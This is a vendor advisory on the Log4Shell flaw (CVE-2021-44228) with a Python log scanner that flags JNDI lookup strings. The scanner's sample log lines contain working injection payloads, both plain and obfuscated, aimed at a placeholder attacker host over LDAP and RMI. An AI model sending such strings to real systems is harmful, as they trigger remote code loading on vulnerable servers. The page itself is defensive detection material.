Log4Shell Vulnerability

Detection Strategies

CVE-2021-44228 / Log4Shell Vulnerability

Industry: N/A | Level: Tactical | Sources: LunaSec & GitHub-Log4Shell-List

A zero-day exploit has been identified for the Java logging library "log4j" that could result in remote code execution. Affected versions include Log4j 2.0-beta9 up to 2.14.1, with service impacts to many Apache Struts configurations and cloud services such as Steam, Apple iCloud, and others. The exploit requires three components: a vulnerable log4j version, any protocol that enables the attacker to send the exploit string, and a log statement that logs the string from the request. Mitigation is available through an update; affected users are recommended to update to log4j version "log4j-2.15.0-rc2". Threat researchers have identified a variety of threats taking advantage of the widespread vulnerability: Kinsing (cryptocurrency miner), Mirai malware, Cobalt Strike, a new unidentified ransomware strain, and likely others yet to be identified.
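The third component above, a log statement that records attacker-supplied input, is also where detection happens: the JNDI lookup syntax has to appear in the logged request. As an added example (not Anvilogic's SPL content or code from the original page), the Python below scans constructed access-log lines for that lookup, including the nested-lookup tricks used to hide the literal token; the rewrite rules are a simplified model of Log4j's lookup resolution, not the library's own code, and hostnames are placeholders.

```python
import re

# Inner lookups commonly used to hide the literal "jndi" token. These two rewrite
# rules are a constructed, simplified model of Log4j's lookup resolution.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.IGNORECASE)   # ${lower:j} -> j
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")                    # ${env:X:-j} -> j
_JNDI = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse nested ${lower:x}, ${upper:x} and ${a:-x} lookups from the inside out."""
    for _ in range(max_rounds):
        prev = text
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        if text == prev:          # nothing left to unwrap
            break
    return text


def is_jndi_lookup(text: str) -> bool:
    """True if the text contains a JNDI lookup, plain or obfuscated by nesting."""
    return _JNDI.search(text) is not None or _JNDI.search(normalize(text)) is not None


# Constructed access-log lines; attacker.example is a placeholder host.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:12 +0000] "GET /?x=${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/b} HTTP/1.1" 404 0 "-" "curl/7.68"',
    '10.0.0.7 - - [10/Dec/2021:12:00:15 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]


def scan(lines):
    """Return (index, line) pairs for lines containing a JNDI lookup; benign lookups are left alone."""
    return [(i, line) for i, line in enumerate(lines) if is_jndi_lookup(line)]


if __name__ == "__main__":
    for i, line in scan(SAMPLE_LOG):
        print(f"line {i}: {line}")
```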

**For updates, detection content & logic, attack flow, threat examples & use case demonstrations, check out our Log4Shell blog.** We're here to help by providing ready-to-deploy detection code (no strings attached): just reach out and we'll send you the Splunk (SPL) detection logic. Contact: detection.support@anvilogic.com
